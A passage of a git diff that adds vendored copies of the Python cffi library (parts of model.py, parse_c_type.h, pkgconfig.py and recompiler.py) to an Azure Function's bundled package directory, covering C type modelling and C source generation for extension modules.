self.fldnames = tuple(names) + self.fldtypes = tuple(types) + self.fldbitsize = tuple(bitsizes) + self.fldquals = tuple(fldquals) + + def get_cached_btype(self, ffi, finishlist, can_delay=False): + BType = StructOrUnionOrEnum.get_cached_btype(self, ffi, finishlist, + can_delay) + if not can_delay: + self.finish_backend_type(ffi, finishlist) + return BType + + def finish_backend_type(self, ffi, finishlist): + if self.completed: + if self.completed != 2: + raise NotImplementedError("recursive structure declaration " + "for '%s'" % (self.name,)) + return + BType = ffi._cached_btypes[self] + # + self.completed = 1 + # + if self.fldtypes is None: + pass # not completing it: it's an opaque struct + # + elif self.fixedlayout is None: + fldtypes = [tp.get_cached_btype(ffi, finishlist) + for tp in self.fldtypes] + lst = list(zip(self.fldnames, fldtypes, self.fldbitsize)) + extra_flags = () + if self.packed: + if self.packed == 1: + extra_flags = (8,) # SF_PACKED + else: + extra_flags = (0, self.packed) + ffi._backend.complete_struct_or_union(BType, lst, self, + -1, -1, *extra_flags) + # + else: + fldtypes = [] + fieldofs, fieldsize, totalsize, totalalignment = self.fixedlayout + for i in range(len(self.fldnames)): + fsize = fieldsize[i] + ftype = self.fldtypes[i] + # + if isinstance(ftype, ArrayType) and ftype.length_is_unknown(): + # fix the length to match the total size + BItemType = ftype.item.get_cached_btype(ffi, finishlist) + nlen, nrest = divmod(fsize, ffi.sizeof(BItemType)) + if nrest != 0: + self._verification_error( + "field '%s.%s' has a bogus size?" 
% ( + self.name, self.fldnames[i] or '{}')) + ftype = ftype.resolve_length(nlen) + self.fldtypes = (self.fldtypes[:i] + (ftype,) + + self.fldtypes[i+1:]) + # + BFieldType = ftype.get_cached_btype(ffi, finishlist) + if isinstance(ftype, ArrayType) and ftype.length is None: + assert fsize == 0 + else: + bitemsize = ffi.sizeof(BFieldType) + if bitemsize != fsize: + self._verification_error( + "field '%s.%s' is declared as %d bytes, but is " + "really %d bytes" % (self.name, + self.fldnames[i] or '{}', + bitemsize, fsize)) + fldtypes.append(BFieldType) + # + lst = list(zip(self.fldnames, fldtypes, self.fldbitsize, fieldofs)) + ffi._backend.complete_struct_or_union(BType, lst, self, + totalsize, totalalignment) + self.completed = 2 + + def _verification_error(self, msg): + raise VerificationError(msg) + + def check_not_partial(self): + if self.partial and self.fixedlayout is None: + raise VerificationMissing(self._get_c_name()) + + def build_backend_type(self, ffi, finishlist): + self.check_not_partial() + finishlist.append(self) + # + return global_cache(self, ffi, 'new_%s_type' % self.kind, + self.get_official_name(), key=self) + + +class StructType(StructOrUnion): + kind = 'struct' + + +class UnionType(StructOrUnion): + kind = 'union' + + +class EnumType(StructOrUnionOrEnum): + kind = 'enum' + partial = False + partial_resolved = False + + def __init__(self, name, enumerators, enumvalues, baseinttype=None): + self.name = name + self.enumerators = enumerators + self.enumvalues = enumvalues + self.baseinttype = baseinttype + self.build_c_name_with_marker() + + def force_the_name(self, forcename): + StructOrUnionOrEnum.force_the_name(self, forcename) + if self.forcename is None: + name = self.get_official_name() + self.forcename = '$' + name.replace(' ', '_') + + def check_not_partial(self): + if self.partial and not self.partial_resolved: + raise VerificationMissing(self._get_c_name()) + + def build_backend_type(self, ffi, finishlist): + self.check_not_partial() + base_btype = self.build_baseinttype(ffi, finishlist) + return global_cache(self, ffi, 'new_enum_type', + self.get_official_name(), + self.enumerators, self.enumvalues, + base_btype, key=self) + + def build_baseinttype(self, ffi, finishlist): + if self.baseinttype is not None: + return self.baseinttype.get_cached_btype(ffi, finishlist) + # + if self.enumvalues: + smallest_value = min(self.enumvalues) + largest_value = max(self.enumvalues) + else: + import warnings + try: + # XXX! The goal is to ensure that the warnings.warn() + # will not suppress the warning. We want to get it + # several times if we reach this point several times. 
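+                # Editor's note (not upstream cffi text): warnings.warn()
+                # deduplicates through the module-level __warningregistry__
+                # dict; clearing it re-arms the warning so every opaque enum
+                # without values produces its own message.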
+ __warningregistry__.clear() + except NameError: + pass + warnings.warn("%r has no values explicitly defined; " + "guessing that it is equivalent to 'unsigned int'" + % self._get_c_name()) + smallest_value = largest_value = 0 + if smallest_value < 0: # needs a signed type + sign = 1 + candidate1 = PrimitiveType("int") + candidate2 = PrimitiveType("long") + else: + sign = 0 + candidate1 = PrimitiveType("unsigned int") + candidate2 = PrimitiveType("unsigned long") + btype1 = candidate1.get_cached_btype(ffi, finishlist) + btype2 = candidate2.get_cached_btype(ffi, finishlist) + size1 = ffi.sizeof(btype1) + size2 = ffi.sizeof(btype2) + if (smallest_value >= ((-1) << (8*size1-1)) and + largest_value < (1 << (8*size1-sign))): + return btype1 + if (smallest_value >= ((-1) << (8*size2-1)) and + largest_value < (1 << (8*size2-sign))): + return btype2 + raise CDefError("%s values don't all fit into either 'long' " + "or 'unsigned long'" % self._get_c_name()) + +def unknown_type(name, structname=None): + if structname is None: + structname = '$%s' % name + tp = StructType(structname, None, None, None) + tp.force_the_name(name) + tp.origin = "unknown_type" + return tp + +def unknown_ptr_type(name, structname=None): + if structname is None: + structname = '$$%s' % name + tp = StructType(structname, None, None, None) + return NamedPointerType(tp, name) + + +global_lock = allocate_lock() +_typecache_cffi_backend = weakref.WeakValueDictionary() + +def get_typecache(backend): + # returns _typecache_cffi_backend if backend is the _cffi_backend + # module, or type(backend).__typecache if backend is an instance of + # CTypesBackend (or some FakeBackend class during tests) + if isinstance(backend, types.ModuleType): + return _typecache_cffi_backend + with global_lock: + if not hasattr(type(backend), '__typecache'): + type(backend).__typecache = weakref.WeakValueDictionary() + return type(backend).__typecache + +def global_cache(srctype, ffi, funcname, *args, **kwds): + key = kwds.pop('key', (funcname, args)) + assert not kwds + try: + return ffi._typecache[key] + except KeyError: + pass + try: + res = getattr(ffi._backend, funcname)(*args) + except NotImplementedError as e: + raise NotImplementedError("%s: %r: %s" % (funcname, srctype, e)) + # note that setdefault() on WeakValueDictionary is not atomic + # and contains a rare bug (http://bugs.python.org/issue19542); + # we have to use a lock and do it ourselves + cache = ffi._typecache + with global_lock: + res1 = cache.get(key) + if res1 is None: + cache[key] = res + return res + else: + return res1 + +def pointer_cache(ffi, BType): + return global_cache('?', ffi, 'new_pointer_type', BType) + +def attach_exception_info(e, name): + if e.args and type(e.args[0]) is str: + e.args = ('%s: %s' % (name, e.args[0]),) + e.args[1:] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/parse_c_type.h b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/parse_c_type.h new file mode 100644 index 0000000..ea1aa24 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/parse_c_type.h @@ -0,0 +1,181 @@ + +/* This part is from file 'cffi/parse_c_type.h'. It is copied at the + beginning of C sources generated by CFFI's ffi.set_source(). 
*/ + +typedef void *_cffi_opcode_t; + +#define _CFFI_OP(opcode, arg) (_cffi_opcode_t)(opcode | (((uintptr_t)(arg)) << 8)) +#define _CFFI_GETOP(cffi_opcode) ((unsigned char)(uintptr_t)cffi_opcode) +#define _CFFI_GETARG(cffi_opcode) (((intptr_t)cffi_opcode) >> 8) + +#define _CFFI_OP_PRIMITIVE 1 +#define _CFFI_OP_POINTER 3 +#define _CFFI_OP_ARRAY 5 +#define _CFFI_OP_OPEN_ARRAY 7 +#define _CFFI_OP_STRUCT_UNION 9 +#define _CFFI_OP_ENUM 11 +#define _CFFI_OP_FUNCTION 13 +#define _CFFI_OP_FUNCTION_END 15 +#define _CFFI_OP_NOOP 17 +#define _CFFI_OP_BITFIELD 19 +#define _CFFI_OP_TYPENAME 21 +#define _CFFI_OP_CPYTHON_BLTN_V 23 // varargs +#define _CFFI_OP_CPYTHON_BLTN_N 25 // noargs +#define _CFFI_OP_CPYTHON_BLTN_O 27 // O (i.e. a single arg) +#define _CFFI_OP_CONSTANT 29 +#define _CFFI_OP_CONSTANT_INT 31 +#define _CFFI_OP_GLOBAL_VAR 33 +#define _CFFI_OP_DLOPEN_FUNC 35 +#define _CFFI_OP_DLOPEN_CONST 37 +#define _CFFI_OP_GLOBAL_VAR_F 39 +#define _CFFI_OP_EXTERN_PYTHON 41 + +#define _CFFI_PRIM_VOID 0 +#define _CFFI_PRIM_BOOL 1 +#define _CFFI_PRIM_CHAR 2 +#define _CFFI_PRIM_SCHAR 3 +#define _CFFI_PRIM_UCHAR 4 +#define _CFFI_PRIM_SHORT 5 +#define _CFFI_PRIM_USHORT 6 +#define _CFFI_PRIM_INT 7 +#define _CFFI_PRIM_UINT 8 +#define _CFFI_PRIM_LONG 9 +#define _CFFI_PRIM_ULONG 10 +#define _CFFI_PRIM_LONGLONG 11 +#define _CFFI_PRIM_ULONGLONG 12 +#define _CFFI_PRIM_FLOAT 13 +#define _CFFI_PRIM_DOUBLE 14 +#define _CFFI_PRIM_LONGDOUBLE 15 + +#define _CFFI_PRIM_WCHAR 16 +#define _CFFI_PRIM_INT8 17 +#define _CFFI_PRIM_UINT8 18 +#define _CFFI_PRIM_INT16 19 +#define _CFFI_PRIM_UINT16 20 +#define _CFFI_PRIM_INT32 21 +#define _CFFI_PRIM_UINT32 22 +#define _CFFI_PRIM_INT64 23 +#define _CFFI_PRIM_UINT64 24 +#define _CFFI_PRIM_INTPTR 25 +#define _CFFI_PRIM_UINTPTR 26 +#define _CFFI_PRIM_PTRDIFF 27 +#define _CFFI_PRIM_SIZE 28 +#define _CFFI_PRIM_SSIZE 29 +#define _CFFI_PRIM_INT_LEAST8 30 +#define _CFFI_PRIM_UINT_LEAST8 31 +#define _CFFI_PRIM_INT_LEAST16 32 +#define _CFFI_PRIM_UINT_LEAST16 33 +#define _CFFI_PRIM_INT_LEAST32 34 +#define _CFFI_PRIM_UINT_LEAST32 35 +#define _CFFI_PRIM_INT_LEAST64 36 +#define _CFFI_PRIM_UINT_LEAST64 37 +#define _CFFI_PRIM_INT_FAST8 38 +#define _CFFI_PRIM_UINT_FAST8 39 +#define _CFFI_PRIM_INT_FAST16 40 +#define _CFFI_PRIM_UINT_FAST16 41 +#define _CFFI_PRIM_INT_FAST32 42 +#define _CFFI_PRIM_UINT_FAST32 43 +#define _CFFI_PRIM_INT_FAST64 44 +#define _CFFI_PRIM_UINT_FAST64 45 +#define _CFFI_PRIM_INTMAX 46 +#define _CFFI_PRIM_UINTMAX 47 +#define _CFFI_PRIM_FLOATCOMPLEX 48 +#define _CFFI_PRIM_DOUBLECOMPLEX 49 +#define _CFFI_PRIM_CHAR16 50 +#define _CFFI_PRIM_CHAR32 51 + +#define _CFFI__NUM_PRIM 52 +#define _CFFI__UNKNOWN_PRIM (-1) +#define _CFFI__UNKNOWN_FLOAT_PRIM (-2) +#define _CFFI__UNKNOWN_LONG_DOUBLE (-3) + +#define _CFFI__IO_FILE_STRUCT (-1) + + +struct _cffi_global_s { + const char *name; + void *address; + _cffi_opcode_t type_op; + void *size_or_direct_fn; // OP_GLOBAL_VAR: size, or 0 if unknown + // OP_CPYTHON_BLTN_*: addr of direct function +}; + +struct _cffi_getconst_s { + unsigned long long value; + const struct _cffi_type_context_s *ctx; + int gindex; +}; + +struct _cffi_struct_union_s { + const char *name; + int type_index; // -> _cffi_types, on a OP_STRUCT_UNION + int flags; // _CFFI_F_* flags below + size_t size; + int alignment; + int first_field_index; // -> _cffi_fields array + int num_fields; +}; +#define _CFFI_F_UNION 0x01 // is a union, not a struct +#define _CFFI_F_CHECK_FIELDS 0x02 // complain if fields are not in the + // "standard layout" or if some are missing +#define 
_CFFI_F_PACKED 0x04 // for CHECK_FIELDS, assume a packed struct +#define _CFFI_F_EXTERNAL 0x08 // in some other ffi.include() +#define _CFFI_F_OPAQUE 0x10 // opaque + +struct _cffi_field_s { + const char *name; + size_t field_offset; + size_t field_size; + _cffi_opcode_t field_type_op; +}; + +struct _cffi_enum_s { + const char *name; + int type_index; // -> _cffi_types, on a OP_ENUM + int type_prim; // _CFFI_PRIM_xxx + const char *enumerators; // comma-delimited string +}; + +struct _cffi_typename_s { + const char *name; + int type_index; /* if opaque, points to a possibly artificial + OP_STRUCT which is itself opaque */ +}; + +struct _cffi_type_context_s { + _cffi_opcode_t *types; + const struct _cffi_global_s *globals; + const struct _cffi_field_s *fields; + const struct _cffi_struct_union_s *struct_unions; + const struct _cffi_enum_s *enums; + const struct _cffi_typename_s *typenames; + int num_globals; + int num_struct_unions; + int num_enums; + int num_typenames; + const char *const *includes; + int num_types; + int flags; /* future extension */ +}; + +struct _cffi_parse_info_s { + const struct _cffi_type_context_s *ctx; + _cffi_opcode_t *output; + unsigned int output_size; + size_t error_location; + const char *error_message; +}; + +struct _cffi_externpy_s { + const char *name; + size_t size_of_result; + void *reserved1, *reserved2; +}; + +#ifdef _CFFI_INTERNAL +static int parse_c_type(struct _cffi_parse_info_s *info, const char *input); +static int search_in_globals(const struct _cffi_type_context_s *ctx, + const char *search, size_t search_len); +static int search_in_struct_unions(const struct _cffi_type_context_s *ctx, + const char *search, size_t search_len); +#endif diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/pkgconfig.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/pkgconfig.py new file mode 100644 index 0000000..89708a5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/pkgconfig.py @@ -0,0 +1,121 @@ +# pkg-config, https://www.freedesktop.org/wiki/Software/pkg-config/ integration for cffi +import sys, os, subprocess + +from .error import PkgConfigError + + +def merge_flags(cfg1, cfg2): + """Merge values from cffi config flags cfg2 to cf1 + + Example: + merge_flags({"libraries": ["one"]}, {"libraries": ["two"]}) + {"libraries": ["one", "two"]} + """ + for key, value in cfg2.items(): + if key not in cfg1: + cfg1[key] = value + else: + if not isinstance(cfg1[key], list): + raise TypeError("cfg1[%r] should be a list of strings" % (key,)) + if not isinstance(value, list): + raise TypeError("cfg2[%r] should be a list of strings" % (key,)) + cfg1[key].extend(value) + return cfg1 + + +def call(libname, flag, encoding=sys.getfilesystemencoding()): + """Calls pkg-config and returns the output if found + """ + a = ["pkg-config", "--print-errors"] + a.append(flag) + a.append(libname) + try: + pc = subprocess.Popen(a, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + except EnvironmentError as e: + raise PkgConfigError("cannot run pkg-config: %s" % (str(e).strip(),)) + + bout, berr = pc.communicate() + if pc.returncode != 0: + try: + berr = berr.decode(encoding) + except Exception: + pass + raise PkgConfigError(berr.strip()) + + if sys.version_info >= (3,) and not isinstance(bout, str): # Python 3.x + try: + bout = bout.decode(encoding) + except UnicodeDecodeError: + raise PkgConfigError("pkg-config %s %s returned bytes that cannot " + 
"be decoded with encoding %r:\n%r" % + (flag, libname, encoding, bout)) + + if os.altsep != '\\' and '\\' in bout: + raise PkgConfigError("pkg-config %s %s returned an unsupported " + "backslash-escaped output:\n%r" % + (flag, libname, bout)) + return bout + + +def flags_from_pkgconfig(libs): + r"""Return compiler line flags for FFI.set_source based on pkg-config output + + Usage + ... + ffibuilder.set_source("_foo", pkgconfig = ["libfoo", "libbar >= 1.8.3"]) + + If pkg-config is installed on build machine, then arguments include_dirs, + library_dirs, libraries, define_macros, extra_compile_args and + extra_link_args are extended with an output of pkg-config for libfoo and + libbar. + + Raises PkgConfigError in case the pkg-config call fails. + """ + + def get_include_dirs(string): + return [x[2:] for x in string.split() if x.startswith("-I")] + + def get_library_dirs(string): + return [x[2:] for x in string.split() if x.startswith("-L")] + + def get_libraries(string): + return [x[2:] for x in string.split() if x.startswith("-l")] + + # convert -Dfoo=bar to list of tuples [("foo", "bar")] expected by distutils + def get_macros(string): + def _macro(x): + x = x[2:] # drop "-D" + if '=' in x: + return tuple(x.split("=", 1)) # "-Dfoo=bar" => ("foo", "bar") + else: + return (x, None) # "-Dfoo" => ("foo", None) + return [_macro(x) for x in string.split() if x.startswith("-D")] + + def get_other_cflags(string): + return [x for x in string.split() if not x.startswith("-I") and + not x.startswith("-D")] + + def get_other_libs(string): + return [x for x in string.split() if not x.startswith("-L") and + not x.startswith("-l")] + + # return kwargs for given libname + def kwargs(libname): + fse = sys.getfilesystemencoding() + all_cflags = call(libname, "--cflags") + all_libs = call(libname, "--libs") + return { + "include_dirs": get_include_dirs(all_cflags), + "library_dirs": get_library_dirs(all_libs), + "libraries": get_libraries(all_libs), + "define_macros": get_macros(all_cflags), + "extra_compile_args": get_other_cflags(all_cflags), + "extra_link_args": get_other_libs(all_libs), + } + + # merge all arguments together + ret = {} + for libname in libs: + lib_flags = kwargs(libname) + merge_flags(ret, lib_flags) + return ret diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/recompiler.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/recompiler.py new file mode 100644 index 0000000..4e33dde --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/recompiler.py @@ -0,0 +1,1581 @@ +import os, sys, io +from . 
import ffiplatform, model +from .error import VerificationError +from .cffi_opcode import * + +VERSION_BASE = 0x2601 +VERSION_EMBEDDED = 0x2701 +VERSION_CHAR16CHAR32 = 0x2801 + +USE_LIMITED_API = (sys.platform != 'win32' or sys.version_info < (3, 0) or + sys.version_info >= (3, 5)) + + +class GlobalExpr: + def __init__(self, name, address, type_op, size=0, check_value=0): + self.name = name + self.address = address + self.type_op = type_op + self.size = size + self.check_value = check_value + + def as_c_expr(self): + return ' { "%s", (void *)%s, %s, (void *)%s },' % ( + self.name, self.address, self.type_op.as_c_expr(), self.size) + + def as_python_expr(self): + return "b'%s%s',%d" % (self.type_op.as_python_bytes(), self.name, + self.check_value) + +class FieldExpr: + def __init__(self, name, field_offset, field_size, fbitsize, field_type_op): + self.name = name + self.field_offset = field_offset + self.field_size = field_size + self.fbitsize = fbitsize + self.field_type_op = field_type_op + + def as_c_expr(self): + spaces = " " * len(self.name) + return (' { "%s", %s,\n' % (self.name, self.field_offset) + + ' %s %s,\n' % (spaces, self.field_size) + + ' %s %s },' % (spaces, self.field_type_op.as_c_expr())) + + def as_python_expr(self): + raise NotImplementedError + + def as_field_python_expr(self): + if self.field_type_op.op == OP_NOOP: + size_expr = '' + elif self.field_type_op.op == OP_BITFIELD: + size_expr = format_four_bytes(self.fbitsize) + else: + raise NotImplementedError + return "b'%s%s%s'" % (self.field_type_op.as_python_bytes(), + size_expr, + self.name) + +class StructUnionExpr: + def __init__(self, name, type_index, flags, size, alignment, comment, + first_field_index, c_fields): + self.name = name + self.type_index = type_index + self.flags = flags + self.size = size + self.alignment = alignment + self.comment = comment + self.first_field_index = first_field_index + self.c_fields = c_fields + + def as_c_expr(self): + return (' { "%s", %d, %s,' % (self.name, self.type_index, self.flags) + + '\n %s, %s, ' % (self.size, self.alignment) + + '%d, %d ' % (self.first_field_index, len(self.c_fields)) + + ('/* %s */ ' % self.comment if self.comment else '') + + '},') + + def as_python_expr(self): + flags = eval(self.flags, G_FLAGS) + fields_expr = [c_field.as_field_python_expr() + for c_field in self.c_fields] + return "(b'%s%s%s',%s)" % ( + format_four_bytes(self.type_index), + format_four_bytes(flags), + self.name, + ','.join(fields_expr)) + +class EnumExpr: + def __init__(self, name, type_index, size, signed, allenums): + self.name = name + self.type_index = type_index + self.size = size + self.signed = signed + self.allenums = allenums + + def as_c_expr(self): + return (' { "%s", %d, _cffi_prim_int(%s, %s),\n' + ' "%s" },' % (self.name, self.type_index, + self.size, self.signed, self.allenums)) + + def as_python_expr(self): + prim_index = { + (1, 0): PRIM_UINT8, (1, 1): PRIM_INT8, + (2, 0): PRIM_UINT16, (2, 1): PRIM_INT16, + (4, 0): PRIM_UINT32, (4, 1): PRIM_INT32, + (8, 0): PRIM_UINT64, (8, 1): PRIM_INT64, + }[self.size, self.signed] + return "b'%s%s%s\\x00%s'" % (format_four_bytes(self.type_index), + format_four_bytes(prim_index), + self.name, self.allenums) + +class TypenameExpr: + def __init__(self, name, type_index): + self.name = name + self.type_index = type_index + + def as_c_expr(self): + return ' { "%s", %d },' % (self.name, self.type_index) + + def as_python_expr(self): + return "b'%s%s'" % (format_four_bytes(self.type_index), self.name) + + +# 
____________________________________________________________ + + +class Recompiler: + _num_externpy = 0 + + def __init__(self, ffi, module_name, target_is_python=False): + self.ffi = ffi + self.module_name = module_name + self.target_is_python = target_is_python + self._version = VERSION_BASE + + def needs_version(self, ver): + self._version = max(self._version, ver) + + def collect_type_table(self): + self._typesdict = {} + self._generate("collecttype") + # + all_decls = sorted(self._typesdict, key=str) + # + # prepare all FUNCTION bytecode sequences first + self.cffi_types = [] + for tp in all_decls: + if tp.is_raw_function: + assert self._typesdict[tp] is None + self._typesdict[tp] = len(self.cffi_types) + self.cffi_types.append(tp) # placeholder + for tp1 in tp.args: + assert isinstance(tp1, (model.VoidType, + model.BasePrimitiveType, + model.PointerType, + model.StructOrUnionOrEnum, + model.FunctionPtrType)) + if self._typesdict[tp1] is None: + self._typesdict[tp1] = len(self.cffi_types) + self.cffi_types.append(tp1) # placeholder + self.cffi_types.append('END') # placeholder + # + # prepare all OTHER bytecode sequences + for tp in all_decls: + if not tp.is_raw_function and self._typesdict[tp] is None: + self._typesdict[tp] = len(self.cffi_types) + self.cffi_types.append(tp) # placeholder + if tp.is_array_type and tp.length is not None: + self.cffi_types.append('LEN') # placeholder + assert None not in self._typesdict.values() + # + # collect all structs and unions and enums + self._struct_unions = {} + self._enums = {} + for tp in all_decls: + if isinstance(tp, model.StructOrUnion): + self._struct_unions[tp] = None + elif isinstance(tp, model.EnumType): + self._enums[tp] = None + for i, tp in enumerate(sorted(self._struct_unions, + key=lambda tp: tp.name)): + self._struct_unions[tp] = i + for i, tp in enumerate(sorted(self._enums, + key=lambda tp: tp.name)): + self._enums[tp] = i + # + # emit all bytecode sequences now + for tp in all_decls: + method = getattr(self, '_emit_bytecode_' + tp.__class__.__name__) + method(tp, self._typesdict[tp]) + # + # consistency check + for op in self.cffi_types: + assert isinstance(op, CffiOp) + self.cffi_types = tuple(self.cffi_types) # don't change any more + + def _enum_fields(self, tp): + # When producing C, expand all anonymous struct/union fields. + # That's necessary to have C code checking the offsets of the + # individual fields contained in them. When producing Python, + # don't do it and instead write it like it is, with the + # corresponding fields having an empty name. Empty names are + # recognized at runtime when we import the generated Python + # file. 
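+        # Editor's illustration (not upstream cffi text): for
+        #     struct s { struct { int a; }; int b; };
+        # the C output enumerates ('a', 'b') so the generated checks can
+        # verify the offset of each real field, while the Python output
+        # keeps the anonymous inner struct as a single field named ''.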
+ expand_anonymous_struct_union = not self.target_is_python + return tp.enumfields(expand_anonymous_struct_union) + + def _do_collect_type(self, tp): + if not isinstance(tp, model.BaseTypeByIdentity): + if isinstance(tp, tuple): + for x in tp: + self._do_collect_type(x) + return + if tp not in self._typesdict: + self._typesdict[tp] = None + if isinstance(tp, model.FunctionPtrType): + self._do_collect_type(tp.as_raw_function()) + elif isinstance(tp, model.StructOrUnion): + if tp.fldtypes is not None and ( + tp not in self.ffi._parser._included_declarations): + for name1, tp1, _, _ in self._enum_fields(tp): + self._do_collect_type(self._field_type(tp, name1, tp1)) + else: + for _, x in tp._get_items(): + self._do_collect_type(x) + + def _generate(self, step_name): + lst = self.ffi._parser._declarations.items() + for name, (tp, quals) in sorted(lst): + kind, realname = name.split(' ', 1) + try: + method = getattr(self, '_generate_cpy_%s_%s' % (kind, + step_name)) + except AttributeError: + raise VerificationError( + "not implemented in recompile(): %r" % name) + try: + self._current_quals = quals + method(tp, realname) + except Exception as e: + model.attach_exception_info(e, name) + raise + + # ---------- + + ALL_STEPS = ["global", "field", "struct_union", "enum", "typename"] + + def collect_step_tables(self): + # collect the declarations for '_cffi_globals', '_cffi_typenames', etc. + self._lsts = {} + for step_name in self.ALL_STEPS: + self._lsts[step_name] = [] + self._seen_struct_unions = set() + self._generate("ctx") + self._add_missing_struct_unions() + # + for step_name in self.ALL_STEPS: + lst = self._lsts[step_name] + if step_name != "field": + lst.sort(key=lambda entry: entry.name) + self._lsts[step_name] = tuple(lst) # don't change any more + # + # check for a possible internal inconsistency: _cffi_struct_unions + # should have been generated with exactly self._struct_unions + lst = self._lsts["struct_union"] + for tp, i in self._struct_unions.items(): + assert i < len(lst) + assert lst[i].name == tp.name + assert len(lst) == len(self._struct_unions) + # same with enums + lst = self._lsts["enum"] + for tp, i in self._enums.items(): + assert i < len(lst) + assert lst[i].name == tp.name + assert len(lst) == len(self._enums) + + # ---------- + + def _prnt(self, what=''): + self._f.write(what + '\n') + + def write_source_to_f(self, f, preamble): + if self.target_is_python: + assert preamble is None + self.write_py_source_to_f(f) + else: + assert preamble is not None + self.write_c_source_to_f(f, preamble) + + def _rel_readlines(self, filename): + g = open(os.path.join(os.path.dirname(__file__), filename), 'r') + lines = g.readlines() + g.close() + return lines + + def write_c_source_to_f(self, f, preamble): + self._f = f + prnt = self._prnt + if self.ffi._embedding is not None: + prnt('#define _CFFI_USE_EMBEDDING') + if not USE_LIMITED_API: + prnt('#define _CFFI_NO_LIMITED_API') + # + # first the '#include' (actually done by inlining the file's content) + lines = self._rel_readlines('_cffi_include.h') + i = lines.index('#include "parse_c_type.h"\n') + lines[i:i+1] = self._rel_readlines('parse_c_type.h') + prnt(''.join(lines)) + # + # if we have ffi._embedding != None, we give it here as a macro + # and include an extra file + base_module_name = self.module_name.split('.')[-1] + if self.ffi._embedding is not None: + prnt('#define _CFFI_MODULE_NAME "%s"' % (self.module_name,)) + prnt('static const char _CFFI_PYTHON_STARTUP_CODE[] = {') + 
self._print_string_literal_in_array(self.ffi._embedding) + prnt('0 };') + prnt('#ifdef PYPY_VERSION') + prnt('# define _CFFI_PYTHON_STARTUP_FUNC _cffi_pypyinit_%s' % ( + base_module_name,)) + prnt('#elif PY_MAJOR_VERSION >= 3') + prnt('# define _CFFI_PYTHON_STARTUP_FUNC PyInit_%s' % ( + base_module_name,)) + prnt('#else') + prnt('# define _CFFI_PYTHON_STARTUP_FUNC init%s' % ( + base_module_name,)) + prnt('#endif') + lines = self._rel_readlines('_embedding.h') + i = lines.index('#include "_cffi_errors.h"\n') + lines[i:i+1] = self._rel_readlines('_cffi_errors.h') + prnt(''.join(lines)) + self.needs_version(VERSION_EMBEDDED) + # + # then paste the C source given by the user, verbatim. + prnt('/************************************************************/') + prnt() + prnt(preamble) + prnt() + prnt('/************************************************************/') + prnt() + # + # the declaration of '_cffi_types' + prnt('static void *_cffi_types[] = {') + typeindex2type = dict([(i, tp) for (tp, i) in self._typesdict.items()]) + for i, op in enumerate(self.cffi_types): + comment = '' + if i in typeindex2type: + comment = ' // ' + typeindex2type[i]._get_c_name() + prnt('/* %2d */ %s,%s' % (i, op.as_c_expr(), comment)) + if not self.cffi_types: + prnt(' 0') + prnt('};') + prnt() + # + # call generate_cpy_xxx_decl(), for every xxx found from + # ffi._parser._declarations. This generates all the functions. + self._seen_constants = set() + self._generate("decl") + # + # the declaration of '_cffi_globals' and '_cffi_typenames' + nums = {} + for step_name in self.ALL_STEPS: + lst = self._lsts[step_name] + nums[step_name] = len(lst) + if nums[step_name] > 0: + prnt('static const struct _cffi_%s_s _cffi_%ss[] = {' % ( + step_name, step_name)) + for entry in lst: + prnt(entry.as_c_expr()) + prnt('};') + prnt() + # + # the declaration of '_cffi_includes' + if self.ffi._included_ffis: + prnt('static const char * const _cffi_includes[] = {') + for ffi_to_include in self.ffi._included_ffis: + try: + included_module_name, included_source = ( + ffi_to_include._assigned_source[:2]) + except AttributeError: + raise VerificationError( + "ffi object %r includes %r, but the latter has not " + "been prepared with set_source()" % ( + self.ffi, ffi_to_include,)) + if included_source is None: + raise VerificationError( + "not implemented yet: ffi.include() of a Python-based " + "ffi inside a C-based ffi") + prnt(' "%s",' % (included_module_name,)) + prnt(' NULL') + prnt('};') + prnt() + # + # the declaration of '_cffi_type_context' + prnt('static const struct _cffi_type_context_s _cffi_type_context = {') + prnt(' _cffi_types,') + for step_name in self.ALL_STEPS: + if nums[step_name] > 0: + prnt(' _cffi_%ss,' % step_name) + else: + prnt(' NULL, /* no %ss */' % step_name) + for step_name in self.ALL_STEPS: + if step_name != "field": + prnt(' %d, /* num_%ss */' % (nums[step_name], step_name)) + if self.ffi._included_ffis: + prnt(' _cffi_includes,') + else: + prnt(' NULL, /* no includes */') + prnt(' %d, /* num_types */' % (len(self.cffi_types),)) + flags = 0 + if self._num_externpy > 0 or self.ffi._embedding is not None: + flags |= 1 # set to mean that we use extern "Python" + prnt(' %d, /* flags */' % flags) + prnt('};') + prnt() + # + # the init function + prnt('#ifdef __GNUC__') + prnt('# pragma GCC visibility push(default) /* for -fvisibility= */') + prnt('#endif') + prnt() + prnt('#ifdef PYPY_VERSION') + prnt('PyMODINIT_FUNC') + prnt('_cffi_pypyinit_%s(const void *p[])' % (base_module_name,)) + prnt('{') + if flags & 
1: + prnt(' if (((intptr_t)p[0]) >= 0x0A03) {') + prnt(' _cffi_call_python_org = ' + '(void(*)(struct _cffi_externpy_s *, char *))p[1];') + prnt(' }') + prnt(' p[0] = (const void *)0x%x;' % self._version) + prnt(' p[1] = &_cffi_type_context;') + prnt('#if PY_MAJOR_VERSION >= 3') + prnt(' return NULL;') + prnt('#endif') + prnt('}') + # on Windows, distutils insists on putting init_cffi_xyz in + # 'export_symbols', so instead of fighting it, just give up and + # give it one + prnt('# ifdef _MSC_VER') + prnt(' PyMODINIT_FUNC') + prnt('# if PY_MAJOR_VERSION >= 3') + prnt(' PyInit_%s(void) { return NULL; }' % (base_module_name,)) + prnt('# else') + prnt(' init%s(void) { }' % (base_module_name,)) + prnt('# endif') + prnt('# endif') + prnt('#elif PY_MAJOR_VERSION >= 3') + prnt('PyMODINIT_FUNC') + prnt('PyInit_%s(void)' % (base_module_name,)) + prnt('{') + prnt(' return _cffi_init("%s", 0x%x, &_cffi_type_context);' % ( + self.module_name, self._version)) + prnt('}') + prnt('#else') + 